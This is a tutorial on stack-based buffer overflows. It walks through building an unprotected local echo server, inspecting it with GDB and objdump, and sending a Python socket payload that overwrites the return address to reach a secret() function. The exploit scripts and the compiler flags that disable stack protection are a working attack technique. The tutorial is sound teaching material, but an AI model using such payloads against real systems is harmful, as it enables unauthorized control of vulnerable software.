Buffer overflow tutorial
This document aims to teach people how to create a piece of data that alters the flow of a program so that it
behaves in a way that was not intended. To begin this lesson you need an understanding of how a function is called
in a computer application written in the C programming language. A group of machine instructions that together
serve a single purpose is called a “function” or sometimes a “method”. When a programmer creates a function, the
name of the function is usually the decision of the programmer, unless the function was acquired by some other
means. The programmer writes these instructions in a human-readable language, in this case C. When the
programmer has finished writing the application, they run it through a compiler, a program that can be thought of
as an advanced find-and-replace tool. This tool converts the human-readable programming language into machine
code and then structures it into a file format suitable for the target operating system. Two of the most
well-known file formats are the Windows Portable Executable (PE) and the Linux Executable and Linkable Format
(ELF).
When an ELF or a PE file is executed, the file is loaded into RAM where it is assigned a memory range for its stack
and its heap. The heap is for storing data which is assigned a memory address at runtime (for example data stored
in memory allocated with the malloc() function). The stack is used for storing local variables whose position
within the stack frame is calculated before the program is executed. When a child function is called, a new
logical block called a stack frame is created on the stack. The first piece of information put onto the stack
frame is the return address: the memory address of the instruction that immediately follows the call in the parent
function. It points past the call instruction rather than at it, so that returning does not re-execute the call
and get stuck in an infinite loop. When the child function has completed, it pops the data off the stack frame
until it reaches the last item, which is the return address pointing back into the parent function. Because
variables and return addresses are grouped into the same region of memory, we can begin to create our stack-based
buffer overflow attack. Overfilling a variable with data causes the application to write into the memory beside
the variable, which means we can modify the return address.
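The layout described above can be imitated in a few lines of Python. This is only a toy model, not the real
process memory: the 16-byte buffer size, the 8-byte saved frame pointer and the helper names are assumptions made
for illustration, and the two addresses are example values. It shows how a copy that does not check its length
runs past the buffer and replaces the stored return address.

```python
import struct

BUFFER_SIZE = 16      # hypothetical size of the local buffer
SAVED_RBP_SIZE = 8    # saved frame pointer on a 64-bit system
RET_OFFSET = BUFFER_SIZE + SAVED_RBP_SIZE  # where the return address starts

def make_frame(return_address):
    """Build a toy stack frame: buffer, saved frame pointer, return address."""
    frame = bytearray(RET_OFFSET + 8)
    struct.pack_into("<Q", frame, RET_OFFSET, return_address)
    return frame

def unchecked_copy(frame, data):
    """Copy data to the start of the frame without a length check, like strcpy() in C."""
    frame[0:len(data)] = data
    return frame

def read_return_address(frame):
    """Read the 8-byte little-endian return address stored in the frame."""
    return struct.unpack_from("<Q", frame, RET_OFFSET)[0]

frame = make_frame(0x400bf8)              # example "legitimate" return address
unchecked_copy(frame, b"A" * 8)           # fits inside the buffer
print(hex(read_return_address(frame)))    # still the original address

# 24 bytes of padding fill the buffer and the saved frame pointer,
# so the next 8 bytes land on the return address.
unchecked_copy(frame, b"A" * RET_OFFSET + struct.pack("<Q", 0x400c12))
print(hex(read_return_address(frame)))    # now the attacker-chosen address
```

In a real program the offsets depend on the compiler and its options, so they have to be measured in a debugger
rather than assumed.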
Imagine a situation where an application calls a function that is vulnerable to a buffer overflow attack. After
calling the vulnerable function, the application tests whether a condition is true (using a secret rule). From
the attacker's point of view, the secret condition is not important. However, the instructions that would be
executed if the condition is true are the target for an attack. To reach them the attacker must overflow the
buffer in the vulnerable function and write a memory address into the buffer which overwrites the return address
at the bottom of the stack frame. This address should not point at the condition; it should point at the first
instruction that would be executed if the condition were true.
To start, compile and run the program. It opens a network socket on the port number supplied as a parameter and
waits for a connection. When a network connection is initiated, it echoes back whatever is sent.
To compile the program on a 64-bit machine running Linux use the following command:
gcc -fno-stack-protector -mpreferred-stack-boundary=4 -ggdb program.c -o a.out
To run the program you can type:
./a.out 8080
To connect to the program you can use telnet, but it will not let you type non-printable characters or bytes
outside of the ASCII range. Non-printable characters are necessary to write a return address in binary.
telnet localhost 8080
Alternatively, if you do not wish to use telnet and would like to use a script, here is an example in Python (note
that memory addresses on Intel CPUs are stored in little-endian format):
import socket
host = "localhost"
port = 8080
size = 30  # maximum number of bytes to read back
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
# A byte string, so that \x00 is sent as a raw NUL byte
s.send(b"AAAAAAA\x00")
data = s.recv(size)
s.close()
print(data)
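Because the address has to be sent in little-endian order, it is easy to get the byte order wrong when typing the
escape sequences by hand. A minimal sketch using Python's standard struct module is shown here; the address
0x400c12 is only an example value and must be replaced with one taken from your own build.

```python
import struct

target = 0x400c12  # example address; substitute the one from your own disassembly

# "<" selects little-endian byte order, "Q" an unsigned 64-bit integer
packed = struct.pack("<Q", target)
print(repr(packed))

# The least significant byte comes first
print([hex(b) for b in bytearray(packed)])
```

The packed value can then be appended to the padding bytes of the payload instead of a hand-written string of
escape sequences.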
There is also a better way to execute your application than “./a.out 8080”. If you launch your application inside a
debugger such as GDB you can add breakpoints to pause execution, you can see the instructions, you can see the
memory addresses of the instructions and you can see your stack frame.
gdb ./a.out
Inside GDB the following commands are useful to know:
disas HandleTCPClient   Disassemble the function “HandleTCPClient”.
disas vulnerable        Disassemble the function “vulnerable”.
set args 8080           Set the program arguments to “8080”.
break *0x1234567        Set a breakpoint to pause execution at memory address 0x1234567. Hint: try setting
                        this to the last instruction in the vulnerable function.
break main              Set a breakpoint at the main function.
run                     Execute the program until a breakpoint is reached.
step                    Execute the next line of source code, stepping into function calls (use stepi to
                        execute a single machine instruction).
info frame              Display the current stack frame information. Try doing this when you are at the
                        breakpoint.
x/128xb $rsp            Display 128 bytes of memory in hexadecimal, starting at the stack pointer ($rsp on
                        64-bit systems, $esp on 32-bit systems).
print variable          Display the value of a variable.
continue                Continue executing the program until the next breakpoint is reached.
kill                    Terminate the application without exiting the debugger.
quit                    Exit the GDB application.
To disassemble the executable outside the debugger try: objdump -d ./a.out > output.txt
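Once the disassembly is in a text file it can be searched with a short script rather than by eye. The sketch
below assumes the default AT&T-style listing that GNU objdump produces, where each instruction line starts with
its address followed by a colon; the helper name find_calls and the sample lines are made up for illustration.

```python
import re

def find_calls(disassembly, function_name):
    """Return the addresses of call instructions that target function_name."""
    pattern = re.compile(
        r"^\s*([0-9a-f]+):\s.*\bcallq?\s+[0-9a-f]+\s+<"
        + re.escape(function_name)
        + r">\s*$"
    )
    addresses = []
    for line in disassembly.splitlines():
        match = pattern.match(line)
        if match:
            addresses.append(int(match.group(1), 16))
    return addresses

# Two illustrative lines in objdump's layout (address, raw bytes, instruction)
sample = (
    "  400c0d:\tb8 00 00 00 00       \tmov    $0x0,%eax\n"
    "  400c12:\te8 82 ff ff ff       \tcallq  400b99 <secret>\n"
)
print([hex(a) for a in find_calls(sample, "secret")])
```

To search the real listing, read output.txt into a string and pass it in place of the sample.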
Note: If you kill the program mid-execution, it may hold the listening port in a waiting state for approximately
55 seconds. This timeout can be monitored using the command:
sudo watch -n 0 netstat -tunpal
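If you prefer to check from a script whether the port has been released, one possible approach is to try binding
to it. This is a rough sketch: the helper names are hypothetical, and it assumes that a bind attempt without
SO_REUSEADDR fails while the port is still held, which is the usual behaviour on Linux.

```python
import socket
import time

def port_is_free(port, host="127.0.0.1"):
    """Return True if a TCP socket can currently be bound to host:port."""
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        probe.bind((host, port))
        return True
    except socket.error:
        return False
    finally:
        probe.close()

def wait_until_free(port, timeout=90.0, interval=1.0):
    """Poll until the port can be bound or the timeout (in seconds) expires."""
    deadline = time.time() + timeout
    while time.time() < deadline:
        if port_is_free(port):
            return True
        time.sleep(interval)
    return port_is_free(port)
```

Calling wait_until_free(8080) before restarting the server avoids an “address already in use” error on startup.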
The trick to creating an exploit for the application is to create a long string that ends with the virtual address
of the instruction we want to jump to. This virtual address is appended to the end of the padding that fills the
buffer, so that it overwrites the return address at the bottom of the stack frame. To find this address run the
following commands:
gdb ./a.out
(gdb) disas HandleTCPClient
The output should include lines similar to the following:
0x0000000000400bf3 <+74>: callq 0x400b6a <vulnerable>
0x0000000000400bf8 <+79>: lea -0x40(%rbp),%rax
0x0000000000400bfc <+83>: mov $0x400e59,%esi
0x0000000000400c01 <+88>: mov %rax,%rdi
0x0000000000400c04 <+91>: callq 0x4008a8 <strcmp@plt>
0x0000000000400c09 <+96>: test %eax,%eax
0x0000000000400c0b <+98>: jne 0x400c17 <HandleTCPClient+110>
0x0000000000400c0d <+100>: mov $0x0,%eax
0x0000000000400c12 <+105>: callq 0x400b99 <secret>
Notice that the address of the instruction that calls the function secret() is 0x400c12. Let's append this memory
address, in little-endian byte order, to our Python exploit. You will need to customize the address for your own
system.
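import socket
host = "localhost"
port = 8080
size = 30  # maximum number of bytes to read back
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
# Padding, then the address 0x400c12 in little-endian byte order
s.send(b"AAAAAAAAAAAAAAAAAAAAAAAA\x12\x0c\x40\x00\x00")
data = s.recv(size)
s.close()
print(data)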
Run the exploit using the following command:
python pycracker.py
The server should output the following lines:
Talking with client 127.0.0.1
This application has been cracked!
Bus error